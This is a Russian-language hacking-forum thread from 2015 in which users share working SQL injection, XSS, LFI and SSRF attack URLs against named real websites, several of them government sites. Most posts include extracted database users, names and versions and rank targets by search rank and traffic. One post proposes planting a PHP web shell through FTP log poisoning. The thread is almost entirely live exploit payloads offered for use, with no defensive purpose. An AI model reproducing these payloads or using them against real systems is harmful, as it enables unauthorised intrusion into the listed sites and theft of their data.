Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    189
    Reputations:
    57
    Code:
    http://ankontr.if.ua/?a_id=6395&page=../../../../../../var/log/lastlog�
    http://ankontr.if.ua/?a_id=6395&page=../../../../../var/run/utmp�
    http://ankontr.if.ua/?a_id=6395&page=../../../../../var/log/wtmp� -- этот пишет логин и ip и  упоминает ftpd.Стоит попробывать конект через ftpd и качестве логина попробовать указать <?php system($_REQUEST['cmd'])?>.
    http://ankontr.if.ua/?a_id=6395&page=../../../../../var/log/xferlog� - довольно большой лог.Гугл говорит что это лог vsftpd сервера
    
     
    #81 Mister_Bert0ni, 31 May 2015
    Last edited: 31 May 2015
  2. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS
    Code:
    http://24log.ru/join.php?c=4&d=6&project_id=&register=yes&sth=0&t=41-1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt
     
  3. Babadyc

    Babadyc New Member

    Joined:
    9 May 2015
    Messages:
    25
    Likes Received:
    3
    Reputations:
    6
    еще

    dbo464376343@74.208.16.31
    5.1.73-log

    Code:
    http://www.southernpowerlifting.com/form.php?id=-1+union+select+group_concat(table_name),2+from+information_schema.tables—+
     
  4. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS
    Code:
    http://russki-mat.net/argot/poisk.php?c=lem&q=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28123%29%3C/ScRiPt%3E
     
  5. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    SQL-inj (Error Based)
    Banner: '5.1.41-log'
    Code:
    http://viko-ias.ru/o_kompanii/novosti/?ajax=1&tag=-5118%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x71706b7a71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x7162627071%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(78)%2cCHAR(121)%2cCHAR(78)%2cCHAR(107)%2cCHAR(103)%2cCHAR(54)%2cCHAR(66)%2cCHAR(57))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)2))x%20from%20information_schema.tables%20group%20by%20x)a)and%22
     
  6. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://telenet.dn.ua/check/index.php/%22%3E%3Cscript%3Ealert%28%22Filipp%20Mustang%22%29%3C/script%3E
     
  7. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    LFI:
    Code:
    http://krivbassham.org.ua/index.php?action=views&getbg=../../../../../../../../../../etc/passwd&page=blogs
    XSS:
    Code:
    http://iona.kiev.ua/photo.php?menu=misc%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&photo=troitsa1520.jpg
     
    #88 Filipp, 3 Jun 2015
    Last edited by a moderator: 4 Jun 2015
  8. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    SQL-inj (Blind)
    Code:
    http://gothart.com.ua/stat/book/show/?id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Cdxh)
     
  9. Bris

    Bris Banned

    Joined:
    2 Jun 2015
    Messages:
    5
    Likes Received:
    2
    Reputations:
    1
    www.tacamateurs.com

    Code:
    http://www.tacamateurs.com/cgi-bin/signup/signup3.pl?famaction=form&network=TAC1&tacid=221%27+and(select+1+from(select+count(*),concat((select+(select+database())+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+%271%27=%271
    
     
  10. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    SSRF:
    Code:
    http://fcgoverla.uz.ua/lib/imageresize.php?cache=1&h=375&imgurl=ftp://test.antichat/image.ssrf&w=500
     
  11. Rosso

    Rosso New Member

    Joined:
    23 May 2015
    Messages:
    6
    Likes Received:
    3
    Reputations:
    5
    Code:
    http://dazo.gov.ua/index.php?id=query&sid=-15 union select concat(0x3c623e3c666f6e7420636f6c6f723d72656420666163653d47656f726769613e,0x3e3e496e6a65637420627920526f73736f203c3c,0x3c62723e,0x3c2f623e3c2f666f6e743e,0x557365723a20,user(),0x3c62723e,0x56657273696f6e3a20,version(),0x3c62723e,0x44617461626173653a20,database())--+
    User: dazo_yura@localhost
    Version: 5.5.41-0ubuntu0.14.04.1
    Database: dazo_dazo
    ТИЦ: 20
    PR: 4
     
  12. Bris

    Bris Banned

    Joined:
    2 Jun 2015
    Messages:
    5
    Likes Received:
    2
    Reputations:
    1
    www.the-ice-man.co.uk
    Code:
    http://www.the-ice-man.co.uk/prodisp.php?prodcatind=1&subcatind=1&pageind=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os),16+--+
    4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu
    
    Префикс таблиц: 'theqice_'
    inurl:"prodisp.php?prodcatind"

    Чет я не понял, пофиксили чтоли уже;/
     
    #93 Bris, 7 Jun 2015
    Last edited: 7 Jun 2015
  13. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    SQL-inj
    Code:
    http://chorus.kh.ua/album.php?id=-1+UNION+SELECT+1,user(),3+--+
     
    #94 Filipp, 11 Jun 2015
    Last edited: 11 Jun 2015
    yarbabin likes this.
  14. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    Code:
    http://www.ruslang.ru/agens.php?id=999999.9'+union+all+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8+--+
    ТИц 1400
    PR 5
    5.5.41-MariaDB

    Code:
    http://www.komod.ru/garniture/search/?query=99'+or+1=(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,dAtAbAsE(),0x217e21,vErSiOn(),0x217e21,uSeR(),0x217e21))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1
    ТИц 900
    PR 3
    Li 6к трафа
    5.6.15-63.0-log

    Code:
    http://dynatone.ru/newslist.php?ngr=2'+and(sElEcT+1+fRoM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,dAtAbAsE(),0x217e21,vErSiOn(),0x217e21,uSeR(),0x217e21))+fRoM+information_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+and+'1'='1
    ТИц 1700
    PR 3
    Li 3к трафа
    5.1.63-0+squeeze1


    Code:
    http://www.auto-magnitola.ru/auto/index.php?firma=9'+union+all+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,NULL,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+

    ТИц 450
    PR 4
    Alexa 300к
    5.5.33-log
    Li 5к трафа
    Code:
    domkom.ru/admin/stuffs_add.php?id_type=7'+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6+--+
    ТИц 275
    PR 3

    5.6.15-63.0-log

     
    #95 nikonic, 11 Jun 2015
    Last edited by a moderator: 11 Jun 2015
    BigBear likes this.
  15. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    Code:
    http://www.province.ru/doska/ind.php?id_typ=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
    CMS: Joomla
    ТИц 1900
    PR 5
    LI скачет, но в основном 20к уников в день

    5.1.49-3
     
  16. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    _________________________
  17. Take_IT

    Take_IT Banned

    Joined:
    11 Mar 2013
    Messages:
    381
    Likes Received:
    162
    Reputations:
    267
    по моему следует запретить постить тут уязвимости тем, кто давно может делать это в специально отведенных темах что висят в профильных разделах
    может ты уже перерос песочницу??
     
    BigBear and yarbabin like this.
  18. Take_IT

    Take_IT Banned

    Joined:
    11 Mar 2013
    Messages:
    381
    Likes Received:
    162
    Reputations:
    267
    в файле который ты скачал:
    1) в названии файла 5.1.23-rc-community-log.txt
    2) ошибка с раскрытием в тексте файла
     
  19. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://www.62.ua/banks/type/1?bank_id=1&income_statement=1&sum=10000%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&term=1
     
Loading...